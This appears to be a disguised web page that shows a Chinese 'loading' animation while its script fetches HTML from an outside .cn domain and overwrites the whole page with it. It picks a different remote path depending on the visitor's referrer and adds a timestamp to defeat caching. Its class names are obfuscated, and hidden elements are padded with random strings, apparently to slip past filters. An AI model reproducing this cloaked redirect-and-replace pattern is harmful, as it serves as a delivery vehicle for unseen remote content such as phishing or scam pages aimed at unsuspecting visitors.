<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .yPQYuVqekC {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .yPQYuVqekC .uwASyk8EMhD {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .yPQYuVqekC .content {
            line-height: 50px;
            text-align: center
        }

        .yPQYuVqekC .img {
            width: 100%
        }

        .yPQYuVqekC .Jo3lK5 {
            text-align: center
        }

        .yPQYuVqekC .Jo3lK5 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .yPQYuVqekC .Jo3lK5 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .yPQYuVqekC .Jo3lK5 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .yPQYuVqekC .Jo3lK5 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .yPQYuVqekC .Jo3lK5 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .yPQYuVqekC .Jo3lK5 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .yPQYuVqekC .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function Tfqv0h9BTr7NA(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Xf1gr = Tfqv0h9BTr7NA('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Xf1gr +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Xf1gr +".html?a=share";
		}
		
        oRX9htlN5=url+"#"+new Date().getTime();
        oRX9htlN5 && function() {
            $.get(oRX9htlN5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >ZrBklFgUYlCSFO8J</h1>
<h1 style='display:none' >ZrBklFgUYlCSFO8J</h1>
<span style='display:none'>PzHZobWm6hAtVjg2oLXyUaCxgz2rFcZvFCMcttdnBCGeCMdGyc</span><div class="yPQYuVqekC">
    <div class="uwASyk8EMhD">
        <div class="Jo3lK5">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>MOvTLfzRYTDGpbPy4iPVWbn6Loed7KveNkgSK4ze2v</a>
<h1 style='display:none' >q4KLLXx2kTraH8ZxeuLv3tw</h1>
<p  style='display:none'>XmfVPgfWexoSPBz7BUP8oEA5ni5kZvhLgTvuHoOcF01yJGarbRp9jVMqB709ahRVYOT3oqqu07qrutilpotYD70h9d</p>
<b style='display:none' >Vr2fjsohVTq5BbLqUsoThqikkx38qgpJ3anRVilhRl5p10FKsKYrJAZgHoV0tueTJZTEnmljxffJEEDs</b>
<a  href='#' style='display:none'>MOvTLfzRYTDGpbPy4iPVWbn6Loed7KveNkgSK4ze2v</a>
<p  style='display:none'>XmfVPgfWexoSPBz7BUP8oEA5ni5kZvhLgTvuHoOcF01yJGarbRp9jVMqB709ahRVYOT3oqqu07qrutilpotYD70h9d</p>
<div style='display:none'>LATPkbfG3r4gioLGgFJPUT7ZOIMs9DaFbuhMR0abTf7vqLLrW26T8AUbj5RDWIK7CZ25OC30M32VeCxwb</div></body>
</html>